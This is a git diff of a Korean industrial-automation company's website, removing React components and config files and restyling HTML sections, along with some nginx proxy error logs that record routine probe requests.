<div className="container mx-auto px-6">
<div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-12 mb-16">
<div className="lg:col-span-1">
<div className="flex items-center gap-3 mb-8">
<div className="bg-blue-600 w-10 h-10 rounded-lg flex items-center justify-center shrink-0 shadow-lg">
<span className="text-white font-bold text-xl font-industrial">H</span>
</div>
<div className="flex flex-col leading-none">
<span className="font-bold text-xl tracking-tight font-industrial text-white">
HANMO
</span>
<span className="text-[9px] font-bold uppercase tracking-[0.2em] mt-1 text-blue-500">
Control & Network
</span>
</div>
</div>
<p className="text-slate-400 leading-relaxed mb-8 max-w-sm">
Providing resilient, high-precision control and networking solutions for the world's most demanding industrial environments.
</p>
</div>
<div>
<h4 className="font-bold text-lg mb-6 border-b border-slate-800 pb-2 font-industrial tracking-wide">Solutions</h4>
<ul className="space-y-4 text-slate-400">
<li><a href="#" className="hover:text-blue-500 transition-colors">DCS Integration</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">SCADA Design</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Industrial Historians</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Smart Field Devices</a></li>
</ul>
</div>
<div>
<h4 className="font-bold text-lg mb-6 border-b border-slate-800 pb-2 font-industrial tracking-wide">Resources</h4>
<ul className="space-y-4 text-slate-400">
<li><a href="#" className="hover:text-blue-500 transition-colors">Technical Docs</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Case Studies</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Security Updates</a></li>
<li><a href="#" className="hover:text-blue-500 transition-colors">Training Portal</a></li>
</ul>
</div>
<div>
<h4 className="font-bold text-lg mb-6 border-b border-slate-800 pb-2 font-industrial tracking-wide">Connect</h4>
<div className="flex gap-4 mb-6">
<a href="#" className="w-10 h-10 rounded-xl bg-slate-800 flex items-center justify-center hover:bg-blue-600 transition-all">
<i className="fab fa-linkedin-in"></i>
</a>
<a href="#" className="w-10 h-10 rounded-xl bg-slate-800 flex items-center justify-center hover:bg-blue-600 transition-all">
<i className="fab fa-twitter"></i>
</a>
</div>
<p className="text-slate-500 text-sm">Subscribe to our newsletter for automation insights.</p>
</div>
</div>
<div className="pt-10 border-t border-slate-800 flex flex-col md:flex-row justify-between items-center gap-6 text-slate-500 text-xs uppercase tracking-widest font-bold">
<p>© 2024 Hanmo Control & Network Co., Ltd.</p>
<div className="flex gap-8">
<a href="#" className="hover:text-slate-300">Privacy Policy</a>
<a href="#" className="hover:text-slate-300">Terms & Conditions</a>
</div>
</div>
</div>
</footer>
);
};
export default Footer;

View File

@@ -1,88 +0,0 @@
import React, { useState, useEffect } from 'react';
const Header: React.FC = () => {
const [isScrolled, setIsScrolled] = useState(false);
const [isMobileMenuOpen, setIsMobileMenuOpen] = useState(false);
useEffect(() => {
const handleScroll = () => setIsScrolled(window.scrollY > 20);
window.addEventListener('scroll', handleScroll);
return () => window.removeEventListener('scroll', handleScroll);
}, []);
const navItems = [
{ name: 'Home', href: '#/' },
{ name: 'Services', href: '#/services' },
{ name: 'About', href: '#/about' },
{ name: 'Contact', href: '#/contact' },
];
return (
<header className={`fixed top-0 left-0 right-0 z-50 transition-all duration-300 ${isScrolled ? 'glass-effect shadow-md py-3' : 'bg-transparent py-6'}`}>
<div className="container mx-auto px-6 flex justify-between items-center">
<a href="#/" className="flex items-center gap-3 group">
<div className="bg-blue-600 w-10 h-10 rounded-lg flex items-center justify-center shrink-0 shadow-lg group-hover:bg-blue-700 transition-colors">
<span className="text-white font-bold text-xl font-industrial">H</span>
</div>
<div className="flex flex-col leading-none">
<span className={`font-bold text-xl tracking-tight font-industrial ${isScrolled ? 'text-slate-900' : 'text-slate-900 md:text-white'}`}>
HANMO
</span>
<span className={`text-[9px] font-bold uppercase tracking-[0.2em] mt-1 ${isScrolled ? 'text-blue-600' : 'text-blue-500'}`}>
Control & Network
</span>
</div>
</a>
{/* Desktop Nav */}
<nav className="hidden md:flex gap-8">
{navItems.map((item) => (
<a
key={item.name}
href={item.href}
className={`text-sm font-semibold hover:text-blue-600 transition-colors ${isScrolled ? 'text-slate-700' : 'text-slate-100'}`}
>
{item.name}
</a>
))}
</nav>
<div className="hidden md:block">
<button className="bg-blue-600 hover:bg-blue-700 text-white px-6 py-2 rounded-full text-sm font-bold shadow-lg transition-all active:scale-95 font-industrial tracking-wide">
REQUEST QUOTE
</button>
</div>
{/* Mobile menu toggle */}
<button
onClick={() => setIsMobileMenuOpen(!isMobileMenuOpen)}
className={`md:hidden p-2 rounded-lg transition-colors ${isScrolled ? 'text-slate-900' : 'text-slate-100'}`}
>
<i className={`fas ${isMobileMenuOpen ? 'fa-times' : 'fa-bars'} text-2xl`}></i>
</button>
</div>
{/* Mobile Menu Drawer */}
<div className={`md:hidden absolute top-full left-0 right-0 bg-white border-t border-slate-100 shadow-2xl transition-all duration-300 ${isMobileMenuOpen ? 'opacity-100 translate-y-0 visible' : 'opacity-0 -translate-y-4 invisible'}`}>
<nav className="flex flex-col p-6 space-y-4">
{navItems.map((item) => (
<a
key={item.name}
href={item.href}
onClick={() => setIsMobileMenuOpen(false)}
className="text-lg font-medium text-slate-800 hover:text-blue-600 border-b border-slate-50 pb-2"
>
{item.name}
</a>
))}
<button className="w-full bg-blue-600 text-white py-4 rounded-xl font-bold font-industrial tracking-widest">
REQUEST QUOTE
</button>
</nav>
</div>
</header>
);
};
export default Header;

View File

@@ -1,55 +0,0 @@
import React from 'react';
const Hero: React.FC = () => {
return (
<section id="home" className="relative min-h-screen flex items-center pt-20 overflow-hidden">
<div className="absolute inset-0 z-0">
<img
src="https://images.unsplash.com/photo-1581092160562-40aa08e78837?auto=format&fit=crop&q=80&w=2000"
alt="Control Room"
className="w-full h-full object-cover"
/>
<div className="absolute inset-0 bg-slate-900/80 md:bg-transparent md:bg-gradient-to-r md:from-slate-900/90 md:to-slate-900/20"></div>
</div>
<div className="container mx-auto px-6 relative z-10">
<div className="max-w-5xl">
<div className="inline-block px-4 py-1.5 mb-6 rounded-full bg-blue-600/20 border border-blue-400/30 text-blue-400 text-[10px] font-bold uppercase industrial-tracking animate-pulse font-industrial">
Next-Gen Industrial Solutions
</div>
<h1 className="text-5xl md:text-8xl font-extralight text-white mb-8 leading-[1.05] premium-kerning font-premium">
Engineering <span className="text-blue-500 font-normal">Precision</span> <br className="hidden md:block"/> for Industrial Networks
</h1>
<p className="text-lg md:text-xl text-slate-300 mb-10 leading-relaxed max-w-2xl font-premium font-light opacity-80">
Hanmo Control & Network Co., Ltd. delivers global-standard DCS and SCADA infrastructure for mission-critical industrial ecosystems and digital transformation.
</p>
<div className="flex flex-col sm:flex-row gap-4">
<a href="#services" className="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-xl font-bold shadow-xl transition-all hover:-translate-y-1 text-center font-industrial text-xs tracking-widest uppercase">
Our Expertise
</a>
<a href="#contact" className="bg-white/10 hover:bg-white/20 text-white border border-white/20 backdrop-blur-md px-8 py-4 rounded-xl font-bold transition-all text-center font-industrial text-xs tracking-widest uppercase">
Schedule Consultation
</a>
</div>
</div>
<div className="mt-20 grid grid-cols-2 lg:grid-cols-4 gap-4 md:gap-8 max-w-5xl">
{[
{ label: 'Installed Nodes', value: '1,500+' },
{ label: 'Uptime', value: '99.99%' },
{ label: 'Certified Experts', value: '60+' },
{ label: 'Years Active', value: '15' },
].map((stat, i) => (
<div key={i} className="p-6 bg-white/5 backdrop-blur-xl rounded-2xl border border-white/10 group hover:bg-white/10 transition-colors">
<div className="text-3xl md:text-4xl font-extralight text-white mb-2 font-premium premium-kerning">{stat.value}</div>
<div className="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold">{stat.label}</div>
</div>
))}
</div>
</div>
</section>
);
};
export default Hero;

View File

@@ -1,78 +0,0 @@
import React from 'react';
import { ServiceItem } from '../types';
const SERVICES: ServiceItem[] = [
{
id: 'dcs',
title: 'Distributed Control (DCS)',
description: 'Advanced, redundant control architectures designed for continuous process industries including power generation and chemicals.',
icon: 'fa-network-wired',
image: 'https://images.unsplash.com/photo-1518770660439-4636190af475?auto=format&fit=crop&q=80&w=800'
},
{
id: 'scada',
title: 'SCADA Solutions',
description: 'High-performance monitoring platforms with cutting-edge HMI, real-time analytics, and secure remote access protocols.',
icon: 'fa-chart-line',
image: 'https://images.unsplash.com/photo-1551288049-bebda4e38f71?auto=format&fit=crop&q=80&w=800'
},
{
id: 'database',
title: 'Industrial Historians',
description: 'Mission-critical database servers and SQL infrastructure optimized for heavy manufacturing data and regulatory compliance.',
icon: 'fa-database',
image: 'https://images.unsplash.com/photo-1558494949-ef010cbdcc48?auto=format&fit=crop&q=80&w=800'
},
{
id: 'instruments',
title: 'Control Instruments',
description: 'Precision field instruments including flow, pressure, and temperature transmitters and smart control valves.',
icon: 'fa-gauge-high',
image: 'https://images.unsplash.com/photo-1531482615713-2afd69097998?auto=format&fit=crop&q=80&w=800'
}
];
const Services: React.FC = () => {
return (
<section id="services" className="py-24 bg-white">
<div className="container mx-auto px-6">
<div className="text-center max-w-3xl mx-auto mb-20">
<h2 className="text-blue-600 font-bold uppercase tracking-widest text-sm mb-3">Capabilities</h2>
<h3 className="text-3xl md:text-5xl font-extrabold text-slate-900 mb-6">World-Class Automation</h3>
<p className="text-slate-600 text-lg leading-relaxed">
We bridge the gap between heavy physical operations and digital intelligence through robust networking and control systems.
</p>
</div>
<div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-8">
{SERVICES.map((service) => (
<div key={service.id} className="group flex flex-col h-full bg-slate-50 border border-slate-100 rounded-3xl overflow-hidden hover:border-blue-200 transition-all hover:shadow-2xl hover:-translate-y-2">
<div className="h-48 overflow-hidden">
<img
src={service.image}
alt={service.title}
className="w-full h-full object-cover grayscale group-hover:grayscale-0 transition-all duration-700 group-hover:scale-110"
/>
</div>
<div className="p-8 flex-grow flex flex-col">
<div className="w-12 h-12 bg-white rounded-xl shadow-sm flex items-center justify-center mb-6 group-hover:bg-blue-600 transition-colors">
<i className={`fas ${service.icon} text-blue-600 group-hover:text-white text-xl`}></i>
</div>
<h4 className="text-xl font-bold text-slate-900 mb-4">{service.title}</h4>
<p className="text-slate-600 text-sm leading-relaxed mb-8 flex-grow">
{service.description}
</p>
<a href="#" className="text-blue-600 font-bold text-sm inline-flex items-center gap-2 group-hover:gap-4 transition-all">
Technical Specs <i className="fas fa-arrow-right"></i>
</a>
</div>
</div>
))}
</div>
</div>
</section>
);
};
export default Services;

View File

@@ -129,45 +129,92 @@
</div> </div>
</div> </div>
</section> </section>
<!-- DCS SECTION -->
<section id="dcs" class="py-32 bg-white"> <section id="dcs" class="py-32 bg-white">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-24"> <div class="text-center max-w-3xl mx-auto mb-12">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="dcs.badge">Advanced Control Systems</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="dcs.badge">
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="dcs.title">DCS Integration</h3> Advanced Control Systems
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="dcs.desc">Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.</p> </h2>
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="dcs.title">
DCS Integration
</h3>
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="dcs.desc">
Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.
</p>
</div> </div>
<div class="grid lg:grid-cols-2 gap-16 items-center max-w-6xl mx-auto"> <div class="grid lg:grid-cols-2 gap-16 items-center max-w-6xl mx-auto">
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl"><img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" alt="DCS Control Room" class="w-full h-full object-cover"></div> <!-- 이미지 -->
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl">
<img src="assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" alt="DCS Control Room" class="w-full h-full object-cover">
</div>
<div> <div>
<div class="space-y-18"> <!-- Honeywell 로고 + 설명 (맨 위로 이동) -->
<!-- Honeywell 로고 이미지 추가 --> <div class="mb-12">
<img src="assets/images/honeywell-logo.svg" alt="Honeywell Logo" class="h-8 w-auto mb-4 object-contain"> <img src="assets/images/honeywell-logo.svg" alt="Honeywell Logo" class="h-8 w-auto mb-4 object-contain">
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f0.desc">
Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance
</p>
</div>
<!-- 아이콘 리스트 -->
<div class="space-y-6">
<div class="flex gap-6"> <div class="flex gap-6">
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f0.desc">Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance</p></div> <div class="flex-shrink-0">
</div> <div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<div class="flex gap-6"> <i class="fas fa-shield-alt"></i>
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-shield-alt"></i></div></div> </div>
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f1.title">Redundant Architecture</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f1.desc">Fault-tolerant systems with dual processing units ensuring 99.99% uptime</p></div> </div>
</div> <div>
<div class="flex gap-6"> <h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f1.title">Redundant Architecture</h4>
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-network-wired"></i></div></div> <p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f1.desc">
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f2.title">Real-time Communication</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f2.desc">Sub-millisecond response times with synchronized control across multiple nodes</p></div> Fault-tolerant systems with dual processing units ensuring 99.99% uptime
</p>
</div>
</div> </div>
<div class="flex gap-6"> <div class="flex gap-6">
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-lock"></i></div></div> <div class="flex-shrink-0">
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f3.title">Security Certified</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f3.desc">IEC 62443 compliance with military-grade encryption protocols</p></div> <div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<i class="fas fa-network-wired"></i>
</div>
</div>
<div>
<h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f2.title">Real-time Communication</h4>
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f2.desc">
Sub-millisecond response times with synchronized control across multiple nodes
</p>
</div>
</div>
<div class="flex gap-6">
<div class="flex-shrink-0">
<div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white">
<i class="fas fa-lock"></i>
</div>
</div>
<div>
<h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f3.title">Security Certified</h4>
<p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f3.desc">
IEC 62443 compliance with military-grade encryption protocols
</p>
</div>
</div> </div>
</div> </div>
<div class="mt-12"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="dcs.btn">Request Technical Specs</a></div>
<!-- 버튼 -->
<div class="mt-12">
<a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="dcs.btn">
Request Technical Specs
</a>
</div>
</div> </div>
</div> </div>
</div> </div>
</section> </section>
<!-- BATCH PROCESS SECTION --> <!-- BATCH PROCESS SECTION -->
<section id="batch" class="pt-32 pb-32 bg-slate-50"> <section id="batch" class="py-32 bg-slate-50">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
<div class="text-center max-w-3xl mx-auto mb-8"> <!--아래 내용과의 간격 mb-16에서 줄임--> <div class="text-center max-w-3xl mx-auto mb-8"> <!--아래 내용과의 간격 mb-16에서 줄임-->
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="batch.badge">Process Automation</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="batch.badge">Process Automation</h2>
@@ -203,8 +250,7 @@
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl"><img src="assets/images/BatchControl.png" alt="Batch Process" class="w-full h-full object-cover"></div> <div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl"><img src="assets/images/BatchControl.png" alt="Batch Process" class="w-full h-full object-cover"></div>
</div> </div>
</div> </div>
</section> </section>
<!-- DATABASE SERVER SECTION --> <!-- DATABASE SERVER SECTION -->
<section id="dbsvr" class="py-32 bg-white"> <section id="dbsvr" class="py-32 bg-white">
<div class="container mx-auto px-6"> <div class="container mx-auto px-6">
@@ -301,7 +347,7 @@
</div> </div>
</div> </div>
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group"> <div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
<div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><svg class="w-20 h-20 text-blue-300 group-hover:text-blue-600 transition-colors"><use href="assets/images/icons/icons.svg#icon-xv"></use></svg></div> <div class="h-32 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><svg class="w-16 h-16 text-blue-300 group-hover:text-blue-600 transition-colors"><use href="assets/images/icons/icons.svg#icon-xv"></use></svg></div>
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i7.title">Shutoff Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i7.desc">Accelerometers and velocity sensors for predictive maintenance</p> <div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i7.title">Shutoff Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i7.desc">Accelerometers and velocity sensors for predictive maintenance</p>
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Automa</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Proval</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Flowserve</div></div> <div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Automa</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Proval</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Flowserve</div></div>
<!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> --> <!-- <a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a> -->
@@ -491,16 +537,16 @@
<div class="grid lg:grid-cols-2 gap-20 items-center"> <div class="grid lg:grid-cols-2 gap-20 items-center">
<div class="relative"> <div class="relative">
<div class="aspect-square rounded-[3rem] overflow-hidden shadow-2xl"><img src="assets/images/ControlRoom7.png" alt="About Hanmo" class="w-full h-full object-cover"></div> <div class="aspect-square rounded-[3rem] overflow-hidden shadow-2xl"><img src="assets/images/ControlRoom7.png" alt="About Hanmo" class="w-full h-full object-cover"></div>
<div class="absolute -bottom-10 -right-10 p-10 bg-blue-600 text-white rounded-[2rem] shadow-2xl max-w-xs"> <div class="absolute -bottom-10 -right-10 p-8 bg-blue-600 text-white rounded-[2rem] shadow-2xl max-w-xs">
<div class="text-6xl font-extralight mb-4 font-premium">20+</div> <div class="text-6xl font-extralight mb-4 font-premium">20+</div>
<div class="text-xs font-bold uppercase tracking-widest leading-loose" data-i18n="about.years">Years of Industrial Excellence</div> <div class="text-xs font-bold uppercase tracking-widest leading-loose" data-i18n="about.years">Years of Industrial Excellence</div>
</div> </div>
</div> </div>
<div class="pt-10"> <div class="mt-10">
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="about.badge">About Hanmo</h2> <h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="about.badge">About Hanmo</h2>
<h3 class="text-4xl md:text-5xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="about.title">Trusted Partner in Industrial Automation</h3> <h3 class="text-4xl md:text-5xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="about.title">Trusted Partner in Industrial Automation</h3>
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p1">Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.</p> <p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p1">Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.</p>
<p class="text-slate-500 leading-relaxed mb-12 font-light" data-i18n="about.p2">Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.</p> <p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="about.p2">Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.</p>
<div class="grid grid-cols-2 gap-6"> <div class="grid grid-cols-2 gap-6">
<div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm"> <div class="p-6 bg-white rounded-2xl border border-slate-100 shadow-sm">
<div class="text-3xl font-light text-slate-900 mb-1 font-premium">ISO 9001</div> <div class="text-3xl font-light text-slate-900 mb-1 font-premium">ISO 9001</div>

View File

@@ -1,16 +0,0 @@
import React from 'react';
import ReactDOM from 'react-dom/client';
import App from './App';
const rootElement = document.getElementById('root');
if (!rootElement) {
throw new Error("Could not find root element to mount to");
}
const root = ReactDOM.createRoot(rootElement);
root.render(
<React.StrictMode>
<App />
</React.StrictMode>
);

View File

@@ -1,7 +0,0 @@
{
"name": "Hanmo Control & Network Co., Ltd.",
"description": "Premium industrial automation solutions provider specializing in DCS, SCADA, Database Servers, and Control Instruments.",
"requestFramePermissions": [
"camera"
]
}

View File

@@ -1,23 +0,0 @@
{
"name": "hanmo-control-&-network-co.,-ltd.",
"private": true,
"version": "0.0.0",
"type": "module",
"scripts": {
"dev": "vite",
"build": "vite build",
"preview": "vite preview"
},
"dependencies": {
"react": "^19.2.4",
"react-dom": "^19.2.4",
"@google/genai": "^1.41.0",
"react-router-dom": "^7.13.0"
},
"devDependencies": {
"@types/node": "^22.14.0",
"@vitejs/plugin-react": "^5.0.0",
"typescript": "~5.8.2",
"vite": "^6.2.0"
}
}

View File

@@ -1,36 +0,0 @@
import { GoogleGenAI } from "@google/genai";
const SYSTEM_INSTRUCTION = `You are the primary AI Technical Consultant for "Hanmo Control & Network Co., Ltd.".
Hanmo is a global leader specializing in:
1. DCS (Distributed Control Systems): High-availability process automation for utility-scale industries.
2. SCADA (Supervisory Control and Data Acquisition): Real-time remote operations and monitoring.
3. Database & Historian Servers: Secure, high-speed industrial data management.
4. Precision Control Instruments: Smart sensors and actuators for flow, pressure, and thermal management.
Tone: Professional, highly technical, authoritative, and helpful.
Language: You must respond in English at all times.
Guidance: Provide expert advice on automation architecture and integration. For pricing or project-specific quotes, instruct the user to use the official contact form on the website.`;
export async function chatWithExpert(message: string, history: {role: 'user' | 'model', text: string}[]) {
try {
const ai = new GoogleGenAI({ apiKey: process.env.API_KEY || '' });
const response = await ai.models.generateContent({
model: 'gemini-3-flash-preview',
contents: [
...history.map(h => ({ role: h.role === 'user' ? 'user' : 'model', parts: [{ text: h.text }] })),
{ role: 'user', parts: [{ text: message }] }
],
config: {
systemInstruction: SYSTEM_INSTRUCTION,
temperature: 0.7,
},
});
return response.text || "I apologize, but I am unable to process your technical inquiry right now. Please try again later.";
} catch (error) {
console.error("Gemini API Error:", error);
return "Our technical advisor is currently offline. Please contact our support team directly via email.";
}
}

View File

@@ -1 +1 @@
{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 6, "last_update": "07:51:01"} {"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 6, "last_update": "13:19:01"}

View File

@@ -1,29 +0,0 @@
{
"compilerOptions": {
"target": "ES2022",
"experimentalDecorators": true,
"useDefineForClassFields": false,
"module": "ESNext",
"lib": [
"ES2022",
"DOM",
"DOM.Iterable"
],
"skipLibCheck": true,
"types": [
"node"
],
"moduleResolution": "bundler",
"isolatedModules": true,
"moduleDetection": "force",
"allowJs": true,
"jsx": "react-jsx",
"paths": {
"@/*": [
"./*"
]
},
"allowImportingTsExtensions": true,
"noEmit": true
}
}

View File

@@ -1,20 +0,0 @@
export interface Message {
role: 'user' | 'model';
text: string;
}
export interface ServiceItem {
id: string;
title: string;
description: string;
icon: string;
image: string;
}
export interface ContactFormData {
name: string;
email: string;
subject: string;
message: string;
}

View File

@@ -1,23 +0,0 @@
import path from 'path';
import { defineConfig, loadEnv } from 'vite';
import react from '@vitejs/plugin-react';
export default defineConfig(({ mode }) => {
const env = loadEnv(mode, '.', '');
return {
server: {
port: 3000,
host: '0.0.0.0',
},
plugins: [react()],
define: {
'process.env.API_KEY': JSON.stringify(env.GEMINI_API_KEY),
'process.env.GEMINI_API_KEY': JSON.stringify(env.GEMINI_API_KEY)
},
resolve: {
alias: {
'@': path.resolve(__dirname, '.'),
}
}
};
});

View File

@@ -1,10 +0,0 @@
2026/02/15 06:35:42 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:37:39 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:38:59 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:40:00 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:40:49 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:41:59 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:42:45 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:43:05 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:43:28 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size
2026/02/15 06:44:14 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size

File diff suppressed because it is too large Load Diff

View File

@@ -1,674 +1,8 @@
2026/02/14 21:50:30 [error] 200#200: *7 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/159751378329916" failed (2: No such file or directory), client: 222.117.41.51, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/159751378329916 HTTP/1.1", host: "mail.hanmocnn.co.kr" 2026/02/19 00:48:14 [error] 992#992: *104509 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/14 22:32:24 [error] 201#201: *1 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/31481293126031" failed (2: No such file or directory), client: 222.117.41.51, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/31481293126031 HTTP/1.1", host: "mail.hanmocnn.co.kr" 2026/02/19 01:01:17 [error] 985#985: *104536 open() "/var/www/html/mcp" failed (2: No such file or directory), client: 45.156.129.65, server: localhost-nginx-proxy-manager, request: "POST /mcp HTTP/1.1", host: "222.117.41.51"
